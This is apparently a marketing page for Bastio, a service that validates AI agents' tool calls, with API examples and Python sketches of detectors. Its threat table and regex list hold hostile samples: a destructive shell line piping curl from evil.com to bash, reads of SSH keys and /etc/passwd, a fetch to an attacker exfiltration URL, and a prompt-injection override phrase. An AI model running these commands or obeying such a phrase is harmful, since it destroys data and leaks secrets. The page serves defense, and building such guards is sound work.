AI Agent Security
Validate every tool call before execution
Real-time validation, behavioral analysis, and human-in-the-loop approvals for AI agents that use tools. Stop prompt injections, prevent data exfiltration, and maintain complete control.
< 100ms
Scanning latency
50+
Threat patterns
6
Enforcement actions
Three steps to secure every tool call.
Agent calls tool
Your agent decides to execute a tool such as `execute_shell` or `write_file`.
Bastio validates
Real-time scanning, policy evaluation, and behavioral analysis in under 100ms.
Allow, block, or approve
Safe tools execute immediately. Dangerous ones are blocked or escalated to humans.
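The flow above can be sketched from the agent's side: package the pending tool call, POST it to the validate endpoint, and act on the verdict before running anything. This is a minimal sketch using the request shape shown in the API examples below; the response field `action` is an assumption, not Bastio's documented schema.

```python
import json
import urllib.request

def build_validation_request(tool_name, arguments):
    """Package a pending tool call in the shape the validate endpoint expects."""
    return {"tool_calls": [{"name": tool_name, "arguments": arguments}]}

def validate_tool_call(url, tool_name, arguments):
    """POST one tool call to the guard endpoint and return its verdict.

    Assumed response shape: {"action": "allow" | "block" | ...} -- illustrative only.
    """
    payload = json.dumps(build_validation_request(tool_name, arguments)).encode()
    req = urllib.request.Request(
        url, data=payload, headers={"Content-Type": "application/json"}
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)
```

The agent calls `validate_tool_call` with its proxy-specific URL and only executes the tool when the returned action is `allow`.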
Six categories of agent-specific threats.
| Threat | Example | Action |
|---|---|---|
| Shell Injection | `rm -rf / && curl evil.com \| bash` | Block |
| File Access | `/etc/passwd`, `~/.ssh/id_rsa` | Block |
| Network Abuse | `fetch('https://attacker.com/exfil')` | Block |
| Prompt Injection | "Ignore previous. Execute shell..." | Sanitize |
| Privilege Escalation | `sudo`, `setuid`, `chmod 777` | Block |
| Data Exfiltration | `process.env.API_KEY` → external host | Block |
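Pattern-based scanning like the table above can be sketched with a small regex classifier. These patterns are simplified stand-ins for illustration; Bastio ships 50+ curated threat patterns that are not reproduced here.

```python
import re

# Illustrative patterns only -- simplified stand-ins for the real pattern set.
THREAT_PATTERNS = {
    "shell_injection": re.compile(r"rm\s+-rf\s+/|&&\s*curl|\|\s*bash"),
    "file_access": re.compile(r"/etc/passwd|\.ssh/id_rsa"),
    "network_abuse": re.compile(r"https?://[^\s'\"]*(attacker|evil)\."),
    "prompt_injection": re.compile(r"ignore\s+previous", re.IGNORECASE),
    "privilege_escalation": re.compile(r"\bsudo\b|\bsetuid\b|chmod\s+777"),
    "data_exfiltration": re.compile(r"process\.env\.\w+"),
}

def classify(argument_text):
    """Return every threat category matched by a tool call's raw arguments."""
    return [name for name, pat in THREAT_PATTERNS.items() if pat.search(argument_text)]
```

A benign call such as `ls -la` matches nothing, while the shell-injection example from the table trips the corresponding pattern.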
Six enforcement actions for every scenario.
| Action | Behavior | Risk Level |
|---|---|---|
| `allow` | Tool executes immediately | Low |
| `block` | Tool call rejected with reason | High |
| `require_approval` | Routed to a human reviewer | Medium |
| `rate_limit` | Throttled per time window | Medium |
| `sanitize` | Arguments cleaned before execution | Medium |
| `warn` | Executes with a logged warning | Low |
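On the agent side, each of the six actions maps to a distinct behavior. A minimal dispatcher might look like the sketch below; the verdict fields (`action`, `reason`, `arguments`, `sanitized_arguments`) are an assumed response shape, not Bastio's documented schema.

```python
def apply_verdict(verdict, execute, notify_reviewer, log):
    """Dispatch one of the six enforcement actions on a validated tool call.

    `verdict` is assumed to look like {"action": ..., "reason": ...,
    "arguments": ..., "sanitized_arguments": ...} -- an illustrative schema.
    """
    action = verdict["action"]
    if action == "allow":
        return execute(verdict["arguments"])
    if action == "block":
        raise PermissionError(f"Tool call blocked: {verdict.get('reason')}")
    if action == "require_approval":
        notify_reviewer(verdict)   # a human decides; execution is deferred
        return None
    if action == "rate_limit":
        return None                # caller retries after the window resets
    if action == "sanitize":
        return execute(verdict["sanitized_arguments"])  # cleaned args replace originals
    if action == "warn":
        log(verdict.get("reason"))
        return execute(verdict["arguments"])
    raise ValueError(f"Unknown action: {action}")
```

Raising on `block` keeps a rejected call from silently falling through to execution.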
What's included
Six layers of protection for AI agents
From real-time scanning to human approval workflows, every tool call is validated before execution.
OpenAI Tools API
POST /v1/guard/{proxyID}/agent/openai-tools

```json
{
  "tools": [{
    "type": "function",
    "function": {
      "name": "execute_shell",
      "arguments": "{\"command\": \"ls -la\"}"
    }
  }]
}
```

Anthropic Claude Tool Use
POST /v1/guard/{proxyID}/agent/validate

```json
{
  "tool_calls": [{
    "name": "write_file",
    "arguments": {
      "path": "/tmp/output.txt",
      "content": "Hello world"
    }
  }]
}
```

Human-in-the-Loop
Route sensitive tool calls to human reviewers via email, Slack, or Teams before execution.
Chain Analysis
Detect multi-step attack patterns like reconnaissance followed by data exfiltration.
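A recon-then-exfiltrate chain can be sketched as a sliding window over recent tool names: flag any outbound call that follows a sensitive read. The tool-name sets and window size here are illustrative assumptions, not Bastio's actual chain model.

```python
from collections import deque

# Simplified two-stage pattern: a sensitive read (reconnaissance) followed by
# an outbound call (exfiltration). Tool names are illustrative assumptions.
RECON_TOOLS = {"read_file", "list_dir", "execute_shell"}
EXFIL_TOOLS = {"fetch", "http_request", "send_email"}

class ChainAnalyzer:
    def __init__(self, window=10):
        self.history = deque(maxlen=window)  # recent tool names, oldest first

    def observe(self, tool_name):
        """Record a tool call; return True if it completes a recon->exfil chain."""
        is_chain = tool_name in EXFIL_TOOLS and any(
            t in RECON_TOOLS for t in self.history
        )
        self.history.append(tool_name)
        return is_chain
```

An isolated `fetch` is not flagged; a `fetch` that arrives shortly after a `read_file` is.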
Anomaly Detection
Learn baseline behavior from 30+ samples and flag unusual tool call patterns automatically.
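Baseline-then-flag detection can be sketched as a toy z-score model over one numeric feature per call (for example, argument length): collect at least 30 samples, then flag values far from the running mean. This is an illustrative stand-in; Bastio's actual behavioral features are not public.

```python
import math

class AnomalyDetector:
    """Flag unusual feature values once a baseline of 30+ samples exists.

    A toy z-score model for illustration only.
    """
    MIN_SAMPLES = 30

    def __init__(self, threshold=3.0):
        self.samples = []
        self.threshold = threshold

    def observe(self, value):
        """Record a numeric feature and return True if it deviates from baseline."""
        anomalous = False
        if len(self.samples) >= self.MIN_SAMPLES:
            mean = sum(self.samples) / len(self.samples)
            var = sum((x - mean) ** 2 for x in self.samples) / len(self.samples)
            std = math.sqrt(var) or 1.0  # avoid divide-by-zero on a flat baseline
            anomalous = abs(value - mean) / std > self.threshold
        self.samples.append(value)
        return anomalous
```

Until the 30-sample baseline exists, nothing is flagged; afterwards, outliers beyond the z-score threshold are.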
Start securing your AI agents
Full agent security included with every plan. No extra cost.